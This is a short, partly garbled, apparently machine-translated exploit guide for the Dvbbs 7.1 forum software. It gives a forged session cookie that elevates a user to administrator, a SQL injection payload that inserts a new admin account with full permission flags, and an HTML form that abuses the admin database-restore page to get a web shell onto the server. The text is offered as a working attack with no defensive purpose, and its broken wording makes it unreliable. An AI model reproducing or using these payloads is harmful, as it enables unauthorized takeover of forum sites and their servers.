Dvbbs 7.1 skips the endless loop. The linzi method can only have one management permission, but it is only a beginner's level.
If it is an SQL version, it is difficult to crack the database. In fact, it seems that you only need to capture the SESSION and do not log on to any user.
During spoofing, do not disable the fake ie.
This is an endless loop SESSION:
ASPSESSIONIDQCTRTQAC = rjnbjlckhgddpnaaiockgcj
Add or replace it with the cookie bar of a spoofed browser.
List = list5 + and + 1% 3D2 = 1 & list5 + and + 1% 3D1 = 1 & list1 + and + 1% 3D2 = 1 & list1 + and + 1% 3D1 = 1 & list3 + and + 1% 3D2 = 1 & list3 + and + 1% 3D1 = 1; ASPSESSIONIDQCTRTQAC = rjnbjlckhgddpnaaiockgcj
Then click any Plate
You can find that the users you cheat and the levels are administrators.
The background administrator can use the user rewards to join
Test', '2017. 0.0.1 ', 5); insert into dv_admin (username, [password], flag, adduser) values ('jinsdb', '4ac646c9e65a1769', '1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37 ', 'jinsdb ');--
Dvbbs7.1 SQL background shell
<Form action = "http: // 127.0.0.1/bbs/admin/data. asp? Act... t = Restore "method =" post ">
<P> location of the uploaded file: <input name = "Dbpath" type = "text" size = "80"> </p>
<P> location to be copied: <input name = "backpath" type = "text" size = "80"> </p>
<P> <input type = "submit" value = "submit"> </p>
</Form>
It seems that 7.1 of usercookies are just a fake.
No need
You can also use
Funny